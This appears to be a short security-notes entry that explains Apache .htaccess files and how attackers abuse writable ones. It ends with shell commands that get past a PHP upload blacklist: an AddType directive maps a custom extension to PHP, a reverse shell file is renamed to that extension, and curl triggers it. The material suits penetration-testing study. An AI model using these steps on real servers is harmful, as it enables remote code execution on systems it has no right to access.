.htaccess

The .htaccess file is a configuration file used by Apache web servers to define directory-level rules without modifying the global server configuration. When present in a directory, Apache parses this file and applies the directives to that directory and all of its subdirectories. The file is often leveraged to control access restrictions, enforce redirects, rewrite URLs, configure custom error pages, or apply specific security rules.

The file operates in a hierarchical manner, meaning directives within a .htaccess located deeper in the file structure can override those set higher up. This allows fine-grained control over individual application components. Since it directly influences the behavior of the web server, its permissions and allowed directives are critical from a security standpoint. Misconfigurations can expose sensitive data, weaken authentication controls, or inadvertently disclose server internals.

Attackers often look for accessible .htaccess files to gain insight into application logic or server behavior. When allowed to be written to by an application or a compromised account, malicious directives may be inserted to enable backdoors, bypass logging, or manipulate request handling. As such, the file is both a legitimate administrative tool and a common target in web exploitation.

For example, if there is a blacklist that dissallows .php files and its variations, such as php5, phar, phtml, etc., an .htaccess file can be created in the /uploads directory and force the server to associated a random extension (e.g. x7331) to the PHP MIME type (application/x-httpd-php):

# Create the .htaccess file
$ echo "AddType application/x-httpd-php .x7331" > .htaccess

# Rename the malicious file
$ cp revshell_ivan.php revshell_ivan.x7331

# Execute the file as a PHP script
$ curl http://access/uploads/revshell_ivan.x7331